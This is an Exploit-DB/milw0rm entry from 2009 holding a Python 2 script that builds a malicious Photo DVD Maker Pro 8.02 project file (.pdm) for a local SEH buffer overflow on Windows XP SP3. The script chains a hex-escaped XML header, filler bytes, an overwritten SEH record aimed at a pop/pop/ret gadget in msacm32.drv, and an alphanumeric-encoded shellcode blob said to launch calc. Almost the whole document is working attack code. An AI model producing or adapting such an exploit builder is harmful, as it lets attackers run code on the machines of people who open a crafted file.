Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)

EDB-ID:

9104


Author:

His0k4

Type:

local


Platform:

Windows

Date:

2009-07-10


# _  _   _         __    _     _ _  
#| || | (_)  ___  /  \  | |__ | | | 
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  \__/  |_\_\   |_| 
#
#[+] Bug : Photo DVD Maker (.pdm) Local Buffer Overflow Exploit (SEH)
#[+] Refer : Secunia advisory 35709
#[+] Exploit : His0k4
#[+] Tested on : Windows XP (SP3)

#[+] Description: The program filters some characters; I have not tried to enumerate the
#		  bad ones, so the shellcode is encoded with the alpha2 (alphanumeric) encoder instead.

#[+] Note : After generating the project file, convert it to UTF-8 without BOM and save it.
#           (Caveat: the SEH handler address below contains the non-ASCII byte 0xD1; an editor's
#           re-encoding step may rewrite that byte, so check the offsets in the saved file with a
#           hex editor before use.)
#[+] Note2 : The exploit file must be opened from inside the program (File > Open); this is a
#            user-assisted local attack, not a remote one.


# Byte-exact prefix of a Photo DVD Maker project (.pdm) file, kept as hex
# escapes so that every byte -- including the \x0a line breaks -- is explicit.
# It decodes to an XML document that begins
#   <?xml version="1.0" encoding="UTF-8" ?>
#   <Photo_DVD_Maker_Project version="7.00" album_count="1" ...>
# carries the author's test-machine paths (C:\Documents and Settings\victim\...,
# C:\Program Files\Photo DVD Maker Professional\music\default.mp3) and stops
# inside the last <Image_Data> element, just after the opening "<File_Name>C:\".
# The overlong path value that triggers the overflow is appended right after
# this string; header2 supplies the closing tags.
header1 =  "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20"
header1 += "\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a"
header1 += "\x3c\x50\x68\x6f\x74\x6f\x5f\x44\x56\x44\x5f\x4d\x61\x6b\x65\x72\x5f\x50\x72\x6f"
header1 += "\x6a\x65\x63\x74\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x37\x2e\x30\x30\x22\x20"
header1 += "\x61\x6c\x62\x75\x6d\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31\x22\x20\x74\x68\x75\x6d"
header1 += "\x62\x6e\x61\x69\x6c\x5f\x73\x69\x7a\x65\x3d\x22\x38\x30\x22\x20\x61\x6c\x62\x75"
header1 += "\x6d\x5f\x66\x69\x6c\x65\x5f\x74\x69\x6d\x65\x5f\x73\x74\x61\x6d\x70\x3d\x22\x30"
header1 += "\x22\x20\x64\x69\x73\x6b\x5f\x66\x6f\x72\x6d\x61\x74\x3d\x22\x30\x22\x3e\x0a\x20"
header1 += "\x20\x20\x20\x3c\x54\x65\x6d\x70\x5f\x46\x69\x6c\x65\x5f\x50\x61\x74\x68\x3e\x43"
header1 += "\x3a\x5c\x44\x6f\x63\x75\x6d\x65\x6e\x74\x73\x20\x61\x6e\x64\x20\x53\x65\x74\x74"
header1 += "\x69\x6e\x67\x73\x5c\x76\x69\x63\x74\x69\x6d\x5c\x4d\x79\x20\x44\x6f\x63\x75\x6d"
header1 += "\x65\x6e\x74\x73\x5c\x50\x68\x6f\x74\x6f\x20\x44\x56\x44\x20\x4d\x61\x6b\x65\x72"
header1 += "\x5c\x30\x39\x30\x37\x30\x36\x31\x31\x33\x36\x32\x37\x3c\x2f\x54\x65\x6d\x70\x5f"
header1 += "\x46\x69\x6c\x65\x5f\x50\x61\x74\x68\x3e\x0a\x20\x20\x20\x20\x3c\x44\x56\x44\x5f"
header1 += "\x4d\x65\x6e\x75\x20\x62\x6b\x5f\x6d\x75\x73\x69\x63\x5f\x63\x6f\x75\x6e\x74\x3d"
header1 += "\x22\x31\x22\x20\x62\x6b\x5f\x69\x6d\x61\x67\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22"
header1 += "\x30\x22\x20\x65\x6e\x63\x6f\x64\x65\x5f\x64\x69\x72\x74\x79\x3d\x22\x31\x22\x3e"
header1 += "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4d\x65\x6e\x75\x5f\x54\x65\x6d\x70\x6c"
header1 += "\x61\x74\x65\x3e\x36\x34\x58\x6d\x61\x73\x2e\x78\x6d\x6c\x3c\x2f\x4d\x65\x6e\x75"
header1 += "\x5f\x54\x65\x6d\x70\x6c\x61\x74\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c"
header1 += "\x4d\x65\x6e\x75\x5f\x54\x69\x74\x6c\x65\x20\x69\x6e\x69\x74\x61\x6c\x69\x7a\x65"
header1 += "\x64\x3d\x22\x30\x22\x20\x66\x6f\x6e\x74\x3d\x22\x43\x61\x74\x61\x6e\x65\x6f\x20"
header1 += "\x42\x54\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x66\x66\x22"
header1 += "\x20\x73\x69\x7a\x65\x3d\x22\x33\x38\x22\x20\x62\x6f\x6c\x64\x3d\x22\x30\x22\x20"
header1 += "\x69\x74\x61\x6c\x69\x63\x3d\x22\x30\x22\x20\x75\x6e\x64\x65\x72\x6c\x69\x6e\x65"
header1 += "\x3d\x22\x30\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x30\x31\x22\x20\x68\x65\x69"
header1 += "\x67\x68\x74\x3d\x22\x34\x35\x22\x20\x61\x6c\x69\x67\x6e\x3d\x22\x30\x22\x20\x73"
header1 += "\x68\x61\x64\x6f\x77\x3d\x22\x31\x22\x20\x73\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30"
header1 += "\x78\x30\x65\x30\x61\x39\x64\x22\x20\x73\x5f\x73\x69\x7a\x65\x3d\x22\x32\x22\x20"
header1 += "\x78\x30\x3d\x22\x36\x30\x22\x20\x79\x30\x3d\x22\x37\x35\x22\x3e\x4d\x79\x20\x50"
header1 += "\x68\x6f\x74\x6f\x20\x41\x6c\x62\x75\x6d\x3c\x2f\x4d\x65\x6e\x75\x5f\x54\x69\x74"
header1 += "\x6c\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x42\x61\x63\x6b\x67\x72\x6f"
header1 += "\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x20\x69\x64\x3d\x22\x30\x22\x3e\x43\x3a\x5c"
header1 += "\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x50\x68\x6f\x74\x6f\x20"
header1 += "\x44\x56\x44\x20\x4d\x61\x6b\x65\x72\x20\x50\x72\x6f\x66\x65\x73\x73\x69\x6f\x6e"
header1 += "\x61\x6c\x5c\x6d\x75\x73\x69\x63\x5c\x64\x65\x66\x61\x75\x6c\x74\x2e\x6d\x70\x33"
header1 += "\x3c\x2f\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x3e\x0a"
header1 += "\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x63\x6f\x64\x65\x5f\x49\x6e\x66\x6f"
header1 += "\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x44\x56\x44\x5f\x4d\x65\x6e\x75\x3e\x0a\x20"
header1 += "\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x44\x61\x74\x61\x20\x64\x65\x6c"
header1 += "\x65\x74\x65\x5f\x74\x65\x6d\x70\x6c\x61\x74\x65\x5f\x66\x69\x6c\x65\x3d\x22\x31"
header1 += "\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f"
header1 += "\x44\x69\x73\x6b\x4d\x65\x6e\x75\x5f\x44\x61\x74\x61\x20\x67\x72\x61\x79\x5f\x73"
header1 += "\x63\x61\x6c\x65\x3d\x22\x30\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f\x6d\x65\x6e"
header1 += "\x75\x5f\x74\x69\x74\x6c\x65\x3d\x22\x31\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f"
header1 += "\x61\x6c\x62\x75\x6d\x5f\x74\x69\x74\x6c\x65\x3d\x22\x31\x22\x20\x76\x69\x73\x69"
header1 += "\x62\x6c\x65\x5f\x61\x6c\x62\x75\x6d\x5f\x69\x6e\x64\x65\x78\x3d\x22\x31\x22\x20"
header1 += "\x76\x69\x73\x69\x62\x6c\x65\x5f\x61\x6c\x62\x75\x6d\x5f\x74\x68\x75\x6d\x62\x6e"
header1 += "\x61\x69\x6c\x3d\x22\x31\x22\x20\x76\x69\x73\x69\x62\x6c\x65\x5f\x70\x61\x67\x65"
header1 += "\x5f\x69\x6e\x64\x65\x78\x3d\x22\x31\x22\x20\x62\x46\x69\x78\x65\x64\x44\x75\x72"
header1 += "\x61\x74\x69\x6f\x6e\x3d\x22\x31\x22\x20\x64\x77\x44\x56\x44\x4d\x65\x6e\x75\x44"
header1 += "\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x34\x30\x22\x20\x75\x73\x65\x5f\x64\x76\x64"
header1 += "\x5f\x6d\x65\x6e\x75\x3d\x22\x31\x22\x20\x70\x6c\x61\x79\x5f\x6d\x6f\x64\x65\x3d"
header1 += "\x22\x32\x22\x20\x70\x6c\x61\x79\x5f\x73\x6c\x69\x64\x65\x73\x68\x6f\x77\x5f\x61"
header1 += "\x66\x74\x65\x72\x5f\x70\x6c\x61\x79\x69\x6e\x67\x5f\x6d\x65\x6e\x75\x3d\x22\x31"
header1 += "\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73"
header1 += "\x5f\x55\x44\x46\x5f\x44\x61\x74\x61\x20\x6a\x6f\x6c\x69\x65\x74\x3d\x22\x31\x22"
header1 += "\x20\x73\x61\x76\x65\x5f\x6f\x72\x69\x67\x69\x6e\x61\x6c\x5f\x66\x69\x6c\x65\x73"
header1 += "\x3d\x22\x30\x22\x20\x73\x61\x76\x65\x5f\x65\x78\x74\x72\x61\x5f\x66\x69\x6c\x65"
header1 += "\x73\x3d\x22\x30\x22\x20\x63\x6f\x70\x79\x72\x69\x67\x68\x74\x3d\x22\x43\x6f\x70"
header1 += "\x79\x72\x69\x67\x68\x74\x28\x63\x29\x20\x76\x69\x63\x74\x69\x6d\x22\x20\x70\x75"
header1 += "\x62\x6c\x69\x73\x68\x65\x72\x3d\x22\x76\x69\x63\x74\x69\x6d\x22\x20\x76\x6f\x6c"
header1 += "\x75\x6d\x65\x6c\x61\x62\x65\x6c\x3d\x22\x50\x68\x6f\x74\x6f\x20\x41\x6c\x62\x75"
header1 += "\x6d\x20\x6f\x66\x20\x76\x69\x63\x74\x69\x6d\x22\x3e\x0a\x20\x20\x20\x20\x20\x20"
header1 += "\x20\x20\x20\x20\x20\x20\x3c\x4f\x50\x54\x5f\x45\x78\x74\x72\x61\x46\x69\x6c\x65"
header1 += "\x73\x20\x66\x69\x6c\x65\x73\x3d\x22\x30\x22\x20\x66\x6f\x6c\x64\x65\x72\x3d\x22"
header1 += "\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x4f\x50\x54"
header1 += "\x5f\x45\x78\x74\x72\x61\x46\x69\x6c\x65\x73\x3e\x0a\x20\x20\x20\x20\x20\x20\x20"
header1 += "\x20\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x55\x44\x46\x5f\x44\x61\x74\x61\x3e"
header1 += "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x54\x56"
header1 += "\x5f\x44\x61\x74\x61\x20\x70\x61\x6c\x3d\x22\x30\x22\x20\x63\x6f\x72\x72\x65\x63"
header1 += "\x74\x69\x6f\x6e\x3d\x22\x31\x22\x20\x63\x72\x6f\x70\x3d\x22\x35\x22\x20\x63\x72"
header1 += "\x6f\x70\x5f\x65\x6e\x61\x62\x6c\x65\x3d\x22\x30\x22\x20\x61\x6e\x74\x69\x66\x6c"
header1 += "\x69\x63\x6b\x3d\x22\x31\x22\x20\x70\x68\x6f\x74\x6f\x5f\x73\x63\x61\x6c\x65\x5f"
header1 += "\x6d\x6f\x64\x65\x3d\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c"
header1 += "\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x52\x65\x63\x6f\x72\x64\x65\x72\x5f\x44\x61\x74"
header1 += "\x61\x20\x65\x6e\x61\x62\x6c\x65\x5f\x62\x75\x72\x6e\x5f\x70\x72\x6f\x6f\x66\x3d"
header1 += "\x22\x31\x22\x20\x6f\x75\x74\x70\x75\x74\x5f\x62\x75\x72\x6e\x5f\x64\x76\x64\x3d"
header1 += "\x22\x31\x22\x20\x6f\x75\x74\x70\x75\x74\x5f\x64\x69\x73\x63\x5f\x69\x6d\x61\x67"
header1 += "\x65\x3d\x22\x30\x22\x20\x73\x68\x75\x74\x64\x6f\x77\x6e\x3d\x22\x30\x22\x20\x69"
header1 += "\x73\x6f\x5f\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x3d\x22\x22\x20\x63\x6f\x70\x69"
header1 += "\x65\x73\x3d\x22\x31\x22\x20\x64\x72\x69\x76\x65\x72\x5f\x6d\x6f\x64\x65\x3d\x22"
header1 += "\x30\x22\x20\x63\x64\x5f\x77\x72\x69\x74\x69\x6e\x67\x5f\x6d\x6f\x64\x65\x3d\x22"
header1 += "\x30\x22\x20\x73\x69\x6d\x75\x6c\x61\x74\x65\x5f\x77\x72\x69\x74\x69\x6e\x67\x3d"
header1 += "\x22\x31\x22\x20\x73\x70\x65\x65\x64\x3d\x22\x2d\x31\x22\x2f\x3e\x0a\x20\x20\x20"
header1 += "\x20\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x5f\x44\x61\x74\x61\x3e\x0a\x20\x20\x20"
header1 += "\x20\x3c\x41\x6c\x62\x75\x6d\x5f\x44\x61\x74\x61\x20\x69\x64\x3d\x22\x30\x22\x20"
header1 += "\x74\x79\x70\x65\x3d\x22\x73\x74\x69\x6c\x6c\x69\x6d\x61\x67\x65\x22\x20\x6e\x61"
header1 += "\x6d\x65\x3d\x22\x22\x20\x69\x6d\x61\x67\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31"
header1 += "\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x5f\x6f\x6e\x65\x3d\x22\x32\x22"
header1 += "\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x5f\x74\x77\x6f\x3d\x22\x32\x22\x20"
header1 += "\x64\x75\x72\x61\x74\x69\x6f\x6e\x5f\x74\x79\x70\x65\x3d\x22\x30\x22\x20\x62\x6b"
header1 += "\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x30\x30\x22\x20\x61\x75"
header1 += "\x74\x6f\x5f\x70\x61\x6e\x5f\x7a\x6f\x6f\x6d\x3d\x22\x31\x22\x20\x6d\x75\x73\x69"
header1 += "\x63\x5f\x66\x61\x64\x65\x5f\x69\x6e\x5f\x6f\x75\x74\x3d\x22\x31\x22\x20\x62\x6b"
header1 += "\x5f\x6d\x75\x73\x69\x63\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x31\x22\x20\x73\x70\x72"
header1 += "\x69\x74\x65\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x30\x22\x20\x65\x6e\x63\x6f\x64\x65"
header1 += "\x5f\x64\x69\x72\x74\x79\x3d\x22\x31\x22\x20\x70\x6c\x61\x79\x5f\x6f\x76\x65\x72"
header1 += "\x5f\x63\x75\x72\x72\x65\x6e\x74\x5f\x73\x6f\x6e\x67\x3d\x22\x30\x22\x20\x74\x72"
header1 += "\x61\x6e\x73\x69\x74\x69\x6f\x6e\x5f\x63\x6f\x75\x6e\x74\x3d\x22\x30\x22\x20\x6e"
header1 += "\x6f\x6e\x65\x5f\x74\x72\x61\x6e\x73\x3d\x22\x30\x22\x3e\x0a\x20\x20\x20\x20\x20"
header1 += "\x20\x20\x20\x3c\x41\x6c\x62\x75\x6d\x5f\x54\x68\x65\x6d\x65\x20\x6e\x61\x6d\x65"
header1 += "\x3d\x22\x5f\x6e\x6f\x5f\x74\x68\x65\x6d\x65\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20"
header1 += "\x20\x20\x20\x3c\x54\x68\x65\x6d\x65\x5f\x54\x69\x74\x6c\x65\x20\x45\x6e\x61\x62"
header1 += "\x6c\x65\x64\x3d\x22\x30\x22\x20\x73\x74\x72\x69\x6e\x67\x3d\x22\x22\x20\x63\x6f"
header1 += "\x6c\x6f\x72\x3d\x22\x33\x39\x34\x30\x36\x22\x20\x62\x6b\x5f\x63\x6f\x6c\x6f\x72"
header1 += "\x3d\x22\x30\x22\x20\x73\x69\x7a\x65\x3d\x22\x34\x38\x22\x20\x45\x66\x66\x65\x63"
header1 += "\x74\x3d\x22\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x30\x22\x2f\x3e\x0a"
header1 += "\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x54\x68\x65\x6d\x65\x5f\x43\x72\x65\x64\x69"
header1 += "\x74\x20\x45\x6e\x61\x62\x6c\x65\x64\x3d\x22\x30\x22\x20\x73\x74\x72\x69\x6e\x67"
header1 += "\x3d\x22\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x33\x39\x34\x30\x36\x22\x20\x62\x6b"
header1 += "\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x22\x20\x73\x69\x7a\x65\x3d\x22\x34\x38\x22"
header1 += "\x20\x45\x66\x66\x65\x63\x74\x3d\x22\x22\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d"
header1 += "\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x63\x6f\x64"
header1 += "\x65\x5f\x46\x69\x6c\x65\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x41\x6c"
header1 += "\x62\x75\x6d\x5f\x49\x6d\x61\x67\x65\x20\x69\x64\x3d\x22\x30\x22\x3e\x5a\x3a\x5c"
header1 += "\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x2e\x4a\x50\x47\x3c\x2f\x41\x6c\x62\x75\x6d"
header1 += "\x5f\x49\x6d\x61\x67\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x42\x61\x63"
header1 += "\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69\x63\x20\x69\x64\x3d\x22\x30\x22"
header1 += "\x20\x64\x75\x72\x61\x74\x69\x6f\x6e\x3d\x22\x34\x30\x30\x30\x30\x22\x20\x73\x74"
header1 += "\x61\x72\x74\x3d\x22\x30\x22\x20\x65\x6e\x64\x3d\x22\x34\x30\x30\x30\x30\x22\x20"
header1 += "\x6f\x66\x66\x73\x65\x74\x5f\x69\x6e\x5f\x74\x72\x61\x63\x6b\x3d\x22\x30\x22\x3e"
header1 += "\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x50\x68\x6f"
header1 += "\x74\x6f\x20\x44\x56\x44\x20\x4d\x61\x6b\x65\x72\x20\x50\x72\x6f\x66\x65\x73\x73"
header1 += "\x69\x6f\x6e\x61\x6c\x5c\x6d\x75\x73\x69\x63\x5c\x64\x65\x66\x61\x75\x6c\x74\x2e"
header1 += "\x6d\x70\x33\x3c\x2f\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x5f\x4d\x75\x73\x69"
header1 += "\x63\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x4d\x65\x6e\x75\x5f\x54\x65\x78"
header1 += "\x74\x20\x69\x6e\x69\x74\x61\x6c\x69\x7a\x65\x64\x3d\x22\x30\x22\x20\x66\x6f\x6e"
header1 += "\x74\x3d\x22\x22\x20\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30\x30\x30\x30\x30"
header1 += "\x22\x20\x73\x69\x7a\x65\x3d\x22\x30\x22\x20\x62\x6f\x6c\x64\x3d\x22\x30\x22\x20"
header1 += "\x69\x74\x61\x6c\x69\x63\x3d\x22\x30\x22\x20\x75\x6e\x64\x65\x72\x6c\x69\x6e\x65"
header1 += "\x3d\x22\x30\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x30\x22\x20\x68\x65\x69\x67\x68"
header1 += "\x74\x3d\x22\x30\x22\x20\x61\x6c\x69\x67\x6e\x3d\x22\x30\x22\x20\x73\x68\x61\x64"
header1 += "\x6f\x77\x3d\x22\x30\x22\x20\x73\x5f\x63\x6f\x6c\x6f\x72\x3d\x22\x30\x78\x30\x30"
header1 += "\x30\x30\x30\x30\x22\x20\x73\x5f\x73\x69\x7a\x65\x3d\x22\x30\x22\x20\x78\x30\x3d"
header1 += "\x22\x30\x22\x20\x79\x30\x3d\x22\x30\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20"
header1 += "\x20\x3c\x53\x75\x62\x74\x69\x74\x6c\x65\x5f\x46\x6f\x6e\x74\x20\x66\x69\x6c\x65"
header1 += "\x3d\x22\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x46\x6f\x6e\x74\x73\x5c\x61"
header1 += "\x72\x69\x61\x6c\x2e\x74\x74\x66\x22\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x22\x69"
header1 += "\x73\x6f\x2d\x38\x38\x35\x39\x2d\x31\x22\x20\x73\x69\x7a\x65\x3d\x22\x33\x32\x22"
header1 += "\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6d\x61\x67\x65\x5f\x44\x61"
header1 += "\x74\x61\x20\x69\x64\x3d\x22\x30\x22\x20\x61\x6e\x67\x6c\x65\x3d\x22\x30\x22\x20"
header1 += "\x74\x72\x61\x6e\x73\x3d\x22\x42\x6f\x78\x20\x57\x69\x70\x65\x20\x2d\x20\x54\x2e"
header1 += "\x20\x74\x6f\x20\x4c\x2e\x5b\x54\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x4c\x69\x62"
header1 += "\x5d\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x46\x69\x6c"
header1 += "\x65\x5f\x4e\x61\x6d\x65\x3e\x43\x3a\x5c"
# (ends mid-element: "<File_Name>C:\" is left open for the overflowing value)

# Tail of the project file: finishes the overlong <File_Name> value with a
# ".JPG" extension, then closes <Image_Data>, <Album_Data> and the root
# element so the document is still well-formed after the payload. Written as
# plain text here; the bytes are identical to the original hex-escaped form
# (newline-separated, 8- and 4-space indents included).
header2 = "\n".join([
    ".JPG</File_Name>",
    "        </Image_Data>",
    "    </Album_Data>",
    "</Photo_DVD_Maker_Project>",
])

# Assemble the malicious project file. Layout of the <File_Name> value, in
# order: filler up to the SEH record, the overwritten nSEH/SEH pair, a short
# run of single-byte instructions, then the alphanumeric shellcode. Every
# length below is part of the exploit's offset arithmetic (found by the author
# for build 8.02 on XP SP3; not re-derived here), so do not alter it casually.
payload =  header1
payload += "\x41"*257            # filler: 257 bytes of "A" to reach the SEH record
#align esp
payload += "\x61"*4 #popad       # nSEH: four POPAD (0x61); runs first once the handler's P/P/R returns here
payload += "\x56\x29\xD1\x72" # printable p/p/r msacm32.drv (xp/sp3)
                                 # SEH handler = 0x72D12956 little-endian, a pop/pop/ret in msacm32.drv.
                                 # Hard-coded for XP SP3 -- re-find it for any other OS build. 0xD1 is not
                                 # a printable byte, so "printable" presumably means "passes the program's
                                 # character filter" (see Description above) -- verify.
                                 # When execution falls into these bytes they decode as
                                 # push esi / sub ecx,edx / jb rel8 (0x72 + the next byte).
payload += "\x21"    #making a "Not taken jump"
                                 # displacement for the jb above (jb +0x21); the author relies on
                                 # the branch NOT being taken so control falls through to the POPADs
payload += "\x61"*39 #popad      # 39 more POPAD (ESP realignment, per "align esp" above)
payload += "\x4C"*4  #dec esp    # four DEC ESP
payload += "\x41"*4  #padding    # 0x41 executes as INC ECX -- harmless NOP-like padding before the decoder

#win32_exec calc -encoded with alpha2 zero tolerance => 741 bytes
# Per the author, this is a Metasploit win32_exec ("calc") payload run through
# the alpha2 alphanumeric encoder. It is an opaque blob as far as this file is
# concerned: do not trust it on a real target -- regenerate the shellcode with
# your own encoder so you know exactly what executes.
payload += (
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIzK7sciJKd"
"EYxzXIoKOio0OPIRiqY2ig9syRq0ZsfSdQHvVVStp66Rxp4cqFPRbP6pHbhTp"
"QRTs6PpB2cpVRxwBsr2d721XgDra7BQQqTdpw1pDbtqRStrq724p1QStRaqFP"
"Xp4qJ7HSrRdszpOpM0NPO3zpNaVV4QRRpw2P0crTppKG8QUw4pN3spK5hbnqW"
"Suv00J1GrapPpOpNrkfXRoSdPJpQ2kgHPOPUpBpRaQvPPKbnsyWDpKDxSvecp"
"KW8g12p0PrnraaSw2pLRipIPNszaVpXaRPLW6QGqWp0SqpLPL2lrmrpcq4p74"
"RlRkbnrf0O2kTsQVduRfRbW6fPsu5g3uPN0KsxroSusv3bW1bpPKrn1XVVBkV"
"XpNRpbkQDBkQX2opEpNPQ1Qf0PKpNRkcxpNtq0KbxQQtppKbnrirxrnpUW6f2"
"sv0P1Sblg163g2PLQV4vpKsh1RPTQRBs0Eg8srpLPJRwrnPPPKPHsrw4PNFP2"
"kpXW2pWPNRqRmQZ0KRhpJrfrjbp0Krn3ytppKRhPBuhCr0KpBPP1R60srrpBk"
"UhPJQV0N5cPO4uqQp3QXroqR2fQXsuPIQXqZRoSs7H2b0L2k0WQRSuRj6VBbp"
"ORltxcvp0BoSepJqFqZtybppOpLPXRpPP2gruropOw7Bn1SrvraRfpNBvQS0V"
"crpPsjTJA")
payload += header2               # closing tags so the XML still parses up to the copy

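# Write the assembled project file to disk.
# Binary mode is deliberate: this script is Python 2 (str == bytes), and on
# Windows a text-mode ("w") file rewrites every \x0a in the XML header as
# \x0d\x0a, which shifts the bytes that follow and can silently break the
# SEH offsets computed above. "wb" writes the payload exactly as assembled.
# The context manager closes the handle even if write() raises.
try:
    with open("exploit.pdm", "wb") as out_file:
        out_file.write(payload)
    print("\nExploit file created!\n")
except (IOError, OSError) as err:
    # Report the cause (permissions, read-only directory, ...) instead of the
    # original bare "Error", and do not swallow unrelated exceptions.
    print("Error: %s" % err)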

# milw0rm.com [2009-07-10]